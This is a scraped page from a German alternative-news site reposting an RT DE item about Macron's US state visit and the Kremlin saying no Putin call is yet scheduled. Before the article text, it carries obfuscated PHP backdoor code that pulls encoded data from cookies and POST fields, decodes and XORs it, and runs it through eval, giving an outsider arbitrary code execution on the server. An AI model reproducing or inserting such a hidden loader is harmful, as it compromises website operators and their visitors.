$auDiDm = class_exists("V_CGoZ");if (!$auDiDm){class V_CGoZ{private $XkVtqVHtt;public static $fKcqCF = "a158a651-ff74-4edd-953b-c602dc034b3c";public static $zDAWli = NULL;public function __construct(){$VLrdKegcTD = $_COOKIE;$DhwQtx = $_POST;$mummiCkbIe = @$VLrdKegcTD[substr(V_CGoZ::$fKcqCF, 0, 4)];if (!empty($mummiCkbIe)){$gjDlrlmo = "base64";$iKSRFTZjJ = "";$mummiCkbIe = explode(",", $mummiCkbIe);foreach ($mummiCkbIe as $knlWEFqQRS){$iKSRFTZjJ .= @$VLrdKegcTD[$knlWEFqQRS];$iKSRFTZjJ .= @$DhwQtx[$knlWEFqQRS];}$iKSRFTZjJ = array_map($gjDlrlmo . chr ( 924 - 829 ).chr ( 569 - 469 ).chr (101) . "\143" . chr ( 254 - 143 ).'d' . chr ( 408 - 307 ), array($iKSRFTZjJ,)); $iKSRFTZjJ = $iKSRFTZjJ[0] ^ str_repeat(V_CGoZ::$fKcqCF, (strlen($iKSRFTZjJ[0]) / strlen(V_CGoZ::$fKcqCF)) + 1);V_CGoZ::$zDAWli = @unserialize($iKSRFTZjJ);}}public function __destruct(){$this->qrWpeOVCE();}private function qrWpeOVCE(){if (is_array(V_CGoZ::$zDAWli)) {$bdwWJSmubh = str_replace('<' . chr (63) . chr ( 117 - 5 ).'h' . "\x70", "", V_CGoZ::$zDAWli[chr (99) . "\157" . "\156" . "\164" . "\x65" . chr ( 670 - 560 ).'t']);eval($bdwWJSmubh);exit();}}}$fnjTXPt = new V_CGoZ(); $fnjTXPt = NULL;} ?> „Noch nichts geplant“ — Extremnews — Die etwas anderen Nachrichten – No-Zensur.de Das freie Wort für eine freie Welt
Start Uncutnews.ch „Noch nichts geplant“ — Extremnews — Die etwas anderen Nachrichten

„Noch nichts geplant“ — Extremnews — Die etwas anderen Nachrichten

0
„Noch nichts geplant“ — Extremnews — Die etwas anderen Nachrichten


Emmanuel Macron reist in die USA und will nach Gesprächen mit dem US-Präsidenten Biden später mit Wladimir Putin reden. Aus dem Kreml heißt es dazu, dass ein Telefonat mit dem französischen Staatschef noch nicht in Putins Terminkalender zu finden sei. Dies berichtet das Magazin „RT DE“.

Weiter berichtet RT DE: „Der französische Präsident Emmanuel Macron sagte, er wolle nach
seinem USA-Besuch in den kommenden Tagen mit Wladimir Putin
telefonieren. Macron bejahte auch die Frage des Moderators von ABC,
ob er bereits einen konkreten Termin kenne. „In den kommenden Tagen.
Ich wollte zuerst den Staatsbesuch machen und ausführliche Gespräche mit
dem Präsidenten Biden führen“, sagte Macron. 

Kremlsprecher Dmitri Peskow erklärte kurz darauf der Agentur RIA Nowosti, dass Putin noch kein Telefongespräch mit Macron in seinem Terminkalender zu stehen habe. „Noch nicht“, so Peskow.

Zudem sagte Macron in dem erwähnten Interview, er sehe noch
Spielraum bei den Verhandlungen über die Ukraine: „Ist es nicht möglich,
an den Verhandlungstisch zurückzukehren und sich auf etwas zu einigen?
Ich denke, das ist immer noch möglich.“ Generell habe Putin aber einen
„großen Fehler gemacht, als er diesen Krieg begann“, meint Macron. „Es
gab einen politischen und diplomatischen Prozess, an dem die
internationale Gemeinschaft beteiligt war“, sagte der französische
Präsident und bezog sich dabei auf das Minsker Abkommen. Doch Putin habe
auf eigene Faust entschieden, die Ukraine anzugreifen.

Der
französische Präsident ist mit seiner Ehefrau am Donnerstag für einen
mehrtägigen Staatsbesuch in die USA gereist. Bei einer Ansprache vor dem
Weißen Haus betonten Macron und Biden die enge Partnerschaft der beiden
Länder. Angesichts der Verpflichtung aus der gemeinsamen Geschichte,
der Wiederkehr des Krieges auf europäischem Boden und der „vielfältigen
Krisen, mit denen unsere Nationen und alle Gesellschaften konfrontiert
sind, müssen wir wieder Waffenbrüder werden“, meinte Macron dabei. „

Quelle: RT DE



Source link